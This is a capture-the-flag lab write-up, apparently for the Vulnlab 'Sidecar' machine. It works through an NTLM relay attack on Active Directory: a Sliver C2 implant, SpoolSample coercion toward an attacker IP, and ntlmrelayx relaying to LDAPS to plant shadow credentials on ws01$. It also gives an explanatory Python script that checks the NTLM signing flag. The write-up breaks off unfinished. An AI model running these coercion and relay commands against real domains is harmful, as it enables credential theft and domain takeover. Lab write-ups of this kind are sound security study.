WebDav to LDAP relay
Finally we need to trigger the HTTP authentication with PetitPotam or SpoolSample.
.
So now we exit and restart the Sliver C2 server,
then we execute one of
execute-assembly -i -E /payloads/payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt"
inline-execute-assembly /payloads/SpoolSample.exe "10.18.2.138 vulnlab@80/blub.txt"
.
So:
sliver (sitecar-3) > use b31f8184-a729-480c-b757-1ac3a3e67669
[*] Active session sitecar-3 (b31f8184-a729-480c-b757-1ac3a3e67669)
sliver (sitecar-3) > whoami
Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (sitecar-3) > execute-assembly -i -E /payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt"
[!] rpc error: code = Unknown desc = implant timeout
sliver (sitecar-3) >
Catching it with ntlmrelayx, relaying to LDAPS on the DC to add shadow credentials to ws01$:
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ impacket-ntlmrelayx -t ldaps://dc01 --shadow-credentials --shadow-target 'ws01$'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.185.38, attacking target ldaps://dc01
[!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)
[-] Authenticating against ldaps://dc01 as SIDECAR/E.KLAYMORE FAILED
[*] HTTPD(80): Client requested path: /puckshell.txt
Now we are stuck at the error:
The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP).
Note what ntlmrelayx actually received: an SMB connection authenticating as SIDECAR/E.KLAYMORE, not an HTTP request from the machine account. SpoolSample takes the host to coerce first and the capture server second (SpoolSample.exe <target> <capture server>); with our own IP 10.8.2.138 as the first argument the implant binds to \\10.8.2.138\pipe\spoolss over SMB as the logged-on user, which is exactly the SMB-sourced, signing-negotiated authentication the relay rejects. The first argument should be ws01 itself (the machine whose account is the --shadow-target), so that its spooler authenticates to the kali...@80 WebDAV path over HTTP.
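What ntlmrelayx is checking there is a single bit in the NTLM AUTHENTICATE message: NTLMSSP_NEGOTIATE_SIGN (0x10). Windows' SMB client sets it (together with ALWAYS_SIGN), the WebClient's HTTP authentication does not, and since the LDAP server expects the negotiated signing afterwards a signed exchange cannot be replayed to it. The following is an added example, not impacket's code and not from this writeup: it builds two constructed AUTHENTICATE messages (only flags, user and domain are meaningful; the challenge responses are left empty) and applies the same flag test, reporting the user name the way the relay log does. The two flag sets are assumptions modelled on the SMB-versus-HTTP behaviour described above, not captures from the lab.

```python
"""Why 'The client requested signing' stops an NTLM relay to LDAP: the decision reduces to
one NegotiateFlags bit that the SMB client sets and the HTTP (WebDAV) client does not."""
import struct

# NTLMSSP NegotiateFlags (MS-NLMP 2.2.2.5), only those needed here
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_NEGOTIATE_SIGN = 0x00000010
NTLMSSP_NEGOTIATE_SEAL = 0x00000020
NTLMSSP_NEGOTIATE_NTLM = 0x00000200
NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000

SIGNATURE = b"NTLMSSP\x00"
# Offset of NegotiateFlags in each message type: NEGOTIATE, CHALLENGE, AUTHENTICATE
FLAGS_OFFSET = {1: 12, 2: 20, 3: 60}


def _fields(length: int, offset: int) -> bytes:
    """Len/MaxLen/BufferOffset triple used for every variable-length field."""
    return struct.pack("<HHI", length, length, offset)


def build_authenticate(flags: int, user: str, domain: str) -> bytes:
    """Constructed minimal AUTHENTICATE_MESSAGE (type 3): empty LM/NT responses, no session key.
    Sample input for the check below, not a message captured from the lab."""
    domain_b = domain.encode("utf-16-le")
    user_b = user.encode("utf-16-le")
    fixed = 88                       # header up to and including Version(8) + MIC(16)
    domain_off = fixed
    user_off = domain_off + len(domain_b)
    end = user_off + len(user_b)
    msg = SIGNATURE + struct.pack("<I", 3)
    msg += _fields(0, end)           # LmChallengeResponse
    msg += _fields(0, end)           # NtChallengeResponse
    msg += _fields(len(domain_b), domain_off)
    msg += _fields(len(user_b), user_off)
    msg += _fields(0, end)           # Workstation
    msg += _fields(0, end)           # EncryptedRandomSessionKey
    msg += struct.pack("<I", flags)
    msg += bytes(8) + bytes(16)      # Version, MIC (zeroed in this sample)
    return msg + domain_b + user_b


def ntlm_message_flags(msg: bytes) -> int:
    """NegotiateFlags of any of the three NTLM message types."""
    if msg[:8] != SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    (mtype,) = struct.unpack_from("<I", msg, 8)
    if mtype not in FLAGS_OFFSET:
        raise ValueError(f"unknown NTLM message type {mtype}")
    return struct.unpack_from("<I", msg, FLAGS_OFFSET[mtype])[0]


def _read_field(msg: bytes, at: int) -> str:
    length, _max, off = struct.unpack_from("<HHI", msg, at)
    return msg[off:off + length].decode("utf-16-le")


def authenticate_user(msg: bytes) -> str:
    """DOMAIN\\user from an AUTHENTICATE message, the way the relay logs it."""
    if struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("only AUTHENTICATE messages carry the user name")
    return f"{_read_field(msg, 28)}\\{_read_field(msg, 36)}"


def ldap_relay_check(msg: bytes) -> tuple:
    """Same decision impacket's LDAP relay client makes on the AUTHENTICATE message."""
    flags = ntlm_message_flags(msg)
    if flags & NTLMSSP_NEGOTIATE_SIGN:
        return False, "client requested signing (NTLMSSP_NEGOTIATE_SIGN); relaying to LDAP will not work"
    return True, "no signing negotiated; LDAP relay can proceed"


# Constructed flag sets (assumption): the SMB client negotiates signing, the WebClient does not
SMB_CLIENT_FLAGS = (NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_NEGOTIATE_SIGN
                    | NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY)
WEBDAV_CLIENT_FLAGS = (NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_NTLM
                       | NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY)

if __name__ == "__main__":
    for label, flags, user in (("SMB (spoolss pipe)", SMB_CLIENT_FLAGS, "E.Klaymore"),
                               ("WebDAV (machine account)", WEBDAV_CLIENT_FLAGS, "WS01$")):
        msg = build_authenticate(flags, user, "SIDECAR")
        ok, why = ldap_relay_check(msg)
        print(f"{label}: {authenticate_user(msg)} flags={ntlm_message_flags(msg):#010x} -> {why}")
```

Running it prints the E.Klaymore message as rejected and the WS01$ message as relayable, which is the difference between the SMB connection the relay logged above and the HTTP authentication the WebDAV coercion is meant to produce.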
to be continued …
.